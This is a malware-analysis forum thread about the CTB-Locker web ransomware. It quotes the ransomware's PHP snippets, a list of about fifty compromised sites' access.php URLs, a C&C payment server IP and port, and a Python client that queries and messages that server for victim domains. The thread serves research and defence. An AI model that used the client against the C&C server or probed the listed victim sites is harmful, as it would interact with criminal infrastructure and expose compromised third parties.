A forum for reverse engineering, OS internals and malware analysis
patriq wrote:Interesting function create_aes_cipher($keypass) .. just curious what he does with $keypass.
function create_aes_cipher($key) {
$aes = new Crypt_AES();
$aes->setKeyLength(256);
$aes->setKey($key);
return $aes;
}
95.215.45.203:9338
http://a1hose.com/access.php
http://albatros46.ru/access.php
http://andreboily.com/access.php
http://associatedvac.alphaandomegamarketinggroup.com/access.php
http://autobot.sk/access.php
http://av-kazan.com/access.php
http://bormed.ru/access.php
http://bylleroseandalexwedding.com/access.php
http://cedrussauna.net/access.php
http://charoenpan.com/access.php
http://chenconstruction.aaomg.com/access.php
http://chrysolitemedia.com/cgi-bin/access.php
http://cngesi.com/access.php
http://corecanada.info/cgi-bin/access.php
http://cresynin.com/cgi-bin/access.php
http://danfill.cn/admin/Logs/access.php
http://directimeca.nationprotect.net/Old_Site_Backup_09-27-07/access.php
http://dostatsoseda.ru/access.php
http://electronics2.aaomg.com/access.php
http://erdeni.ru/access.php
http://farini.org/access.php
http://fastrentsrl.com/access.php
http://gaminggix.com/access.php
http://genevecorp.com/access.php
http://gjswan.com/access.php
http://inspirationbydesire.com/access.php
http://ivoxlab.net/access.php
http://jobsloaded.com/access.php
http://kemerthai.com/access.php
http://kibiifoundation.org/access.php
http://kjerrman.net/access.php
http://klinika-redwhite.com/access.php
http://konyalife.com/access.php
http://lawyerpublicity.com/access.php
http://legal-website-design.com/access.php
http://maxleathercases.aaomg.com/access.php
http://orangecountyplasterandstucco.com/access.php
http://ourfrontline.com/access.php
http://profibella.ro/access.php
http://pusintara.com/access.php
http://ruetzamps.com/access.php
http://salonincognito.aaomg.com/access.php
http://saunacushions.com/access.php
http://singaporegirlescorts.com/access.php
http://sosudistyezvezdochki.ru/access.php
http://stian.malkenes.com/access.php
http://studiogreystar.com/access.php
http://theexposuresgallery.com/access.php
http://toashavaccine.com/cgi-bin/access.php
http://velolenta.com/access.php
http://wanttosleepbetter.com/access.php
$req = substr($_POST["msg"], 0, 2048);
socket_write($sock, $req, strlen($req));
#!/usr/bin/env python
import argparse
import socket
def send(s, args):
s.send('snd')
s.send(args.domain.ljust(128))
s.send(args.msg)
def read(s, args):
s.send('rcv')
s.send(args.domain.ljust(128))
ret = s.recv(2048)
print ret
def status(s, args):
s.send('vic')
s.send(args.domain.ljust(128))
ret = s.recv(64)
print ret
def main(args):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((args.host, args.port))
try:
args.action(s, args)
finally:
s.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CTB-locker client")
parser.add_argument("-i", "--host", dest="host", type=str, default="95.215.45.203", help="C&C payment server")
parser.add_argument("-p", "--port", dest="port", type=int, default=9338, help="C&C payment server")
subparsers = parser.add_subparsers(title='subcommands', description='Action to perform')
status_parser = subparsers.add_parser('status')
status_parser.set_defaults(action=status)
status_parser.add_argument(dest="domain", type=str, help="Victim domain to check")
send_parser = subparsers.add_parser('send')
send_parser.set_defaults(action=send)
send_parser.add_argument(dest="domain", type=str, help="Victim domain to check")
send_parser.add_argument(dest="msg", type=str, help="Message to send")
read_parser = subparsers.add_parser('read')
read_parser.set_defaults(action=read)
read_parser.add_argument(dest="domain", type=str, help="Victim domain to check")
args = parser.parse_args()
main(args)
Kafeine wrote:Sample come from my blog :Awesome work man
http://malware.dontneedcoffee.com/2014/ ... nd-it.html
